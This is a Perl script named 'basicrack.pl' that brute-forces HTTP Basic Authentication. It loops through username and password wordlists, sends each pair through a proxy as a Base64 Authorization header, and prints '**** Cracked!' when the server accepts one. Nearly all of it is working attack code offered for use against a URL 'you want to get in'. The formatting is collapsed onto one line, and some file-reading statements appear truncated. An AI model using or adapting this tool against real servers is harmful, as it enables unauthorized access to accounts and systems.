#!/usr/bin/perl # ---- basicrack.pl # http Basic Authorization brute forcer. # use your favorite wordlists as $userfile and $passfile. # # White_E # http://ttj.virtualave.net/ $userfile = 'hoge.txt'; # username lists $passfile = 'gimue.di'; # password lists $url = 'http://'; # URL you want to get in $proxy = ''; # your favorite proxy server $|=1; use Socket; ($phost,$pport) = split(':',$proxy); $addr=inet_aton($phost) || die "Err: $phost not found.\n"; $paddr=sockaddr_in($pport,$addr); if ($url =~ m/^http:\/\/([^\/]*)\/(.*)$/) { $host=$1; $file=$2; } else { die "Err: can't handle the URL.\n"; } open(U,$userfile);@ulist=;close(U); open(P,$passfile);@plist=

;close(P); foreach (@ulist) { chomp($_); } foreach (@plist) { chomp($_); } for ($i=0; $i <= $#ulist; $i++) { for ($j=0; $j<= $#plist; $j++) { $uandp = "$ulist[$i]:$plist[$j]"; print "trying $uandp\n"; $attack = &base64en($uandp); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')); select(S);$|=1;select(STDOUT); connect(S,$paddr) || die "Err: connect().\n"; print S << "__ATTACK__"; GET http://$host/$file HTTP/1.0 Referer: http://$host/$file Host: $host Proxy-Connection: Keep-Alive Authorization: Basic $attack __ATTACK__ $rep=; close(S); if ($rep =~ m/\s200\s/) { print "**** Cracked! $uandp\n"; print "$rep"; exit; } elsif ($rep =~ m/\s401\s/) { # print "Err0r 401. $uadnp\n"; next; } else { print "Err0r: $rep"; } } } print "---- Done.\n"; exit; # thanks to Wake Tsuneaki (http://cgiroom.nu/) sub e_base64_table { %e_base64 = ( '000000','A','000001','B','000010','C','000011','D' ,'000100','E','000101','F','000110','G','000111','H','001000','I' ,'001001','J','001010','K','001011','L','001100','M','001101','N' ,'001110','O','001111','P','010000','Q','010001','R','010010','S' ,'010011','T','010100','U','010101','V','010110','W','010111','X' ,'011000','Y','011001','Z','011010','a','011011','b','011100','c' ,'011101','d','011110','e','011111','f','100000','g','100001','h' ,'100010','i','100011','j','100100','k','100101','l','100110','m' ,'100111','n','101000','o','101001','p','101010','q','101011','r' ,'101100','s','101101','t','101110','u','101111','v','110000','w' ,'110001','x','110010','y','110011','z','110100','0','110101','1' ,'110110','2','110111','3','111000','4','111001','5','111010','6' ,'111011','7','111100','8','111101','9','111110','+','111111','/'); } sub base64en { &e_base64_table unless %e_base64; my $str = $_[0]; my $tmp = ""; $str = unpack("B*",$str); $tmp = length($str) % 6; $str .= '0' x (6 - $tmp) if ($tmp); $str =~ s/(......)/$e_base64{$1}/g; $tmp = length($str) % 4; $str .= '=' x (4 - $tmp) if ($tmp); return $str; }